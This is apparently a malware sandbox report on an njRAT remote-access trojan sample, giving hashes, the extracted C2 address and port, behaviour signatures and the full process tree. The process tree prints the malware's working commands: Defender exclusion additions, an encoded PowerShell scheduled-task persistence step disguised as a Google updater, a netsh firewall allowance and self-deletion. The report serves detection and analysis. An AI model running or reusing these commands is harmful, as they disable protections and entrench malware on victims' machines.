njrat | 0f6084e2d90e3429b34cc2950ca31fde03ffcceb0b1470935e89116d9ed04e1f

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
06-07-2022 22:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0648873dd8d00b2eca5eaa5680f7a5b6.exe
Size

4.9MB
MD5

0648873dd8d00b2eca5eaa5680f7a5b6
SHA1

fada8b49ca5b898c9e31bc87f2b37a267599d406
SHA256

0f6084e2d90e3429b34cc2950ca31fde03ffcceb0b1470935e89116d9ed04e1f
SHA512

88fd72593cb94da497bf5ed7b9e4f35cfac74e9e5280d8d9f0708c6867518c4f0444ab0426ba8f94f86ffbcc3263b83cd6ce436d094bd82ec5e5bc8e4a5908d0

Score

10^/10

njrat hacked evasion persistence suricata trojan

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

HacKed

51.89.91.139:5050

Mutex

5db0afc818875fbd9be3e842f2d3f24b

Attributes

reg_key
5db0afc818875fbd9be3e842f2d3f24b
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Executes dropped EXE 4 IoCs

Processes:

driver.exeServer.exeGoogleChromer.exeupdater.exe

pid process

4432 driver.exe
4344 Server.exe
3948 GoogleChromer.exe
3300 updater.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

3044 netsh.exe

pid	process
4432	driver.exe
4344	Server.exe
3948	GoogleChromer.exe
3300	updater.exe

pid	process
3044	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

driver.exeServer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	driver.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	Server.exe

Drops startup file 2 IoCs

Processes:

GoogleChromer.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5db0afc818875fbd9be3e842f2d3f24b.exe	GoogleChromer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5db0afc818875fbd9be3e842f2d3f24b.exe	GoogleChromer.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

GoogleChromer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5db0afc818875fbd9be3e842f2d3f24b = "\"C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromer.exe\" .."	GoogleChromer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5db0afc818875fbd9be3e842f2d3f24b = "\"C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromer.exe\" .."	GoogleChromer.exe

Drops autorun.inf file 1 TTPs 3 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

GoogleChromer.exe

description	ioc	process
File opened for modification	C:\autorun.inf	GoogleChromer.exe
File created	D:\autorun.inf	GoogleChromer.exe
File created	C:\autorun.inf	GoogleChromer.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.EXEupdater.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log	updater.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

driver.exeupdater.exe

pid process

4432 driver.exe
4432 driver.exe
3300 updater.exe
3300 updater.exe

pid	process
4432	driver.exe
4432	driver.exe
3300	updater.exe
3300	updater.exe

Drops file in Program Files directory 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exedriver.exepowershell.exepowershell.exepowershell.EXEupdater.exeGoogleChromer.exe

pid	process
3984	powershell.exe
3984	powershell.exe
2620	powershell.exe
4432	driver.exe
4432	driver.exe
2620	powershell.exe
4432	driver.exe
224	powershell.exe
224	powershell.exe
3192	powershell.exe
3192	powershell.exe
5116	powershell.EXE
5116	powershell.EXE
3300	updater.exe
3300	updater.exe
3300	updater.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe
3948	GoogleChromer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

GoogleChromer.exe

pid process

3948 GoogleChromer.exe

pid	process
3948	GoogleChromer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exedriver.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	4432	driver.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeIncreaseQuotaPrivilege	224	powershell.exe
Token: SeSecurityPrivilege	224	powershell.exe
Token: SeTakeOwnershipPrivilege	224	powershell.exe
Token: SeLoadDriverPrivilege	224	powershell.exe
Token: SeSystemProfilePrivilege	224	powershell.exe
Token: SeSystemtimePrivilege	224	powershell.exe
Token: SeProfSingleProcessPrivilege	224	powershell.exe
Token: SeIncBasePriorityPrivilege	224	powershell.exe
Token: SeCreatePagefilePrivilege	224	powershell.exe
Token: SeBackupPrivilege	224	powershell.exe
Token: SeRestorePrivilege	224	powershell.exe
Token: SeShutdownPrivilege	224	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeSystemEnvironmentPrivilege	224	powershell.exe
Token: SeRemoteShutdownPrivilege	224	powershell.exe
Token: SeUndockPrivilege	224	powershell.exe
Token: SeManageVolumePrivilege	224	powershell.exe
Token: 33	224	powershell.exe
Token: 34	224	powershell.exe
Token: 35	224	powershell.exe
Token: 36	224	powershell.exe
Token: SeIncreaseQuotaPrivilege	224	powershell.exe
Token: SeSecurityPrivilege	224	powershell.exe
Token: SeTakeOwnershipPrivilege	224	powershell.exe
Token: SeLoadDriverPrivilege	224	powershell.exe
Token: SeSystemProfilePrivilege	224	powershell.exe
Token: SeSystemtimePrivilege	224	powershell.exe
Token: SeProfSingleProcessPrivilege	224	powershell.exe
Token: SeIncBasePriorityPrivilege	224	powershell.exe
Token: SeCreatePagefilePrivilege	224	powershell.exe
Token: SeBackupPrivilege	224	powershell.exe
Token: SeRestorePrivilege	224	powershell.exe
Token: SeShutdownPrivilege	224	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeSystemEnvironmentPrivilege	224	powershell.exe
Token: SeRemoteShutdownPrivilege	224	powershell.exe
Token: SeUndockPrivilege	224	powershell.exe
Token: SeManageVolumePrivilege	224	powershell.exe
Token: 33	224	powershell.exe
Token: 34	224	powershell.exe
Token: 35	224	powershell.exe
Token: 36	224	powershell.exe
Token: SeIncreaseQuotaPrivilege	224	powershell.exe
Token: SeSecurityPrivilege	224	powershell.exe
Token: SeTakeOwnershipPrivilege	224	powershell.exe
Token: SeLoadDriverPrivilege	224	powershell.exe
Token: SeSystemProfilePrivilege	224	powershell.exe
Token: SeSystemtimePrivilege	224	powershell.exe
Token: SeProfSingleProcessPrivilege	224	powershell.exe
Token: SeIncBasePriorityPrivilege	224	powershell.exe
Token: SeCreatePagefilePrivilege	224	powershell.exe
Token: SeBackupPrivilege	224	powershell.exe
Token: SeRestorePrivilege	224	powershell.exe
Token: SeShutdownPrivilege	224	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeSystemEnvironmentPrivilege	224	powershell.exe
Token: SeRemoteShutdownPrivilege	224	powershell.exe
Token: SeUndockPrivilege	224	powershell.exe
Token: SeManageVolumePrivilege	224	powershell.exe
Token: 33	224	powershell.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

0648873dd8d00b2eca5eaa5680f7a5b6.execmd.execmd.execmd.execmd.exedriver.execmd.exeServer.exepowershell.EXEupdater.exeGoogleChromer.exe

description	pid	process	target process
PID 2272 wrote to memory of 2984	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 2984	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 2984	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2984 wrote to memory of 3984	2984	cmd.exe	powershell.exe
PID 2984 wrote to memory of 3984	2984	cmd.exe	powershell.exe
PID 2984 wrote to memory of 3984	2984	cmd.exe	powershell.exe
PID 2272 wrote to memory of 2880	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 2880	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 2880	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 1832	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 1832	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 1832	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 2936	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 2936	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2272 wrote to memory of 2936	2272	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2880 wrote to memory of 2620	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2620	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2620	2880	cmd.exe	powershell.exe
PID 1832 wrote to memory of 4432	1832	cmd.exe	driver.exe
PID 1832 wrote to memory of 4432	1832	cmd.exe	driver.exe
PID 2936 wrote to memory of 4344	2936	cmd.exe	Server.exe
PID 2936 wrote to memory of 4344	2936	cmd.exe	Server.exe
PID 2936 wrote to memory of 4344	2936	cmd.exe	Server.exe
PID 4432 wrote to memory of 224	4432	driver.exe	powershell.exe
PID 4432 wrote to memory of 224	4432	driver.exe	powershell.exe
PID 2880 wrote to memory of 3192	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 3192	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 3192	2880	cmd.exe	powershell.exe
PID 4432 wrote to memory of 1688	4432	driver.exe	cmd.exe
PID 4432 wrote to memory of 1688	4432	driver.exe	cmd.exe
PID 1688 wrote to memory of 4848	1688	cmd.exe	choice.exe
PID 1688 wrote to memory of 4848	1688	cmd.exe	choice.exe
PID 4344 wrote to memory of 3948	4344	Server.exe	GoogleChromer.exe
PID 4344 wrote to memory of 3948	4344	Server.exe	GoogleChromer.exe
PID 4344 wrote to memory of 3948	4344	Server.exe	GoogleChromer.exe
PID 5116 wrote to memory of 3300	5116	powershell.EXE	updater.exe
PID 5116 wrote to memory of 3300	5116	powershell.EXE	updater.exe
PID 3300 wrote to memory of 1004	3300	updater.exe	conhost.exe
PID 3300 wrote to memory of 1004	3300	updater.exe	conhost.exe
PID 3300 wrote to memory of 1004	3300	updater.exe	conhost.exe
PID 3948 wrote to memory of 3044	3948	GoogleChromer.exe	netsh.exe
PID 3948 wrote to memory of 3044	3948	GoogleChromer.exe	netsh.exe
PID 3948 wrote to memory of 3044	3948	GoogleChromer.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\0648873dd8d00b2eca5eaa5680f7a5b6.exe
"C:\Users\Admin\AppData\Local\Temp\0648873dd8d00b2eca5eaa5680f7a5b6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Failed! MSVPC1400.dll is missing!','Error','OK','Error')"
2⤵
- Suspicious use of WriteProcessMemory
PID:2984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Failed! MSVPC1400.dll is missing!','Error','OK','Error')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3192

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\driver.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Users\Admin\AppData\Local\Temp\driver.exe
"C:\Users\Admin\AppData\Local\Temp\driver.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAcAAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAGcAQQBiAFEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGIAUQBCAHEAQQBIAEEAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAZQBsAHMAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBsAHgAZwB0ACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAdQB4AHYAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwByAG8AbABhACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAZAByAGkAdgBlAHIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBpAGoAdQB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBhAHUAYQBlACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
4⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\driver.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:4848

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\Server.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2936

C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4344

C:\Users\Admin\AppData\Roaming\GoogleChromer.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromer.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3948

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\GoogleChromer.exe" "GoogleChromer.exe" ENABLE
5⤵
- Modifies Windows Firewall
PID:3044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGgAbQAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBqAHAAIwA+AA=="
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5116

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3300

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "nhetcxofc"
3⤵
PID:1004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
4.9MB

MD5
1528714ebf9ec93106e200719e94239f

SHA1
9321ca4531d1384bcb8f9d95b574148dbd8e8a4a

SHA256
064331c558242898b53bbbfe2ef22bc0bb908ffa5a106fe3f45866acfccfae5c

SHA512
a2d69bd0a3063efe3ba461b7ca1e48e20a2aed623aa8b1fb6e0692c0008649e5c7c8ad053f5d37512574de4dbdbed4bd675aa89267b67db69ee839450e66f71a

Download Submit
C:\Program Files\Google\Chrome\updater.exe
